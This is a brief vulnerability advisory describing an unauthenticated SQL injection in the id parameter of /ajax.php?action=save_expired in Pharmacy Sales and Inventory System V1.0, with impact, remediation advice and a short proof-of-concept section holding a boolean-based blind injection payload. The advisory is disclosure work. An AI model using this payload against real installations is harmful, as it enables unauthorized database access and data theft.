# Vulnerability Summary: SQL Injection in Pharmacy Sales and Inventory System V1.0 ## Vulnerability Overview * **Affected Product**: Pharmacy Sales and Inventory System V1.0 * **Vulnerability Type**: SQL Injection * **Vulnerable File**: `/ajax.php?action=save_expired` * **Vulnerable Parameter**: POST parameter `id` * **Root Cause**: The code fails to properly sanitize or validate the user-supplied `id` parameter, directly concatenating it into SQL queries. * **Exploitation Conditions**: No authentication or authorization is required to exploit this vulnerability. ## Impact Scope Attackers can leverage this vulnerability to gain unauthorized database access, leak sensitive data, tamper with data, and disrupt system control, posing a severe threat to system security and business continuity. ## Remediation 1. **Use Prepared Statements and Parameter Binding**: Separate SQL code from user input data to prevent SQL injection. 2. **Input Validation and Filtering**: Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize Database User Privileges**: Ensure database connection accounts have only the minimum privileges required to perform their tasks, avoiding the use of high-privilege accounts (such as root or admin) for daily operations. 4. **Regular Security Audits**: Conduct regular security audits of code and systems to promptly identify and remediate potential security vulnerabilities. ## POC Code ```python Parameter: id (POST) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: id=(SELECT (CASE WHEN (4784=4784) THEN 5 ELSE (SELECT 7970 UNION SELECT 3350) END)) ```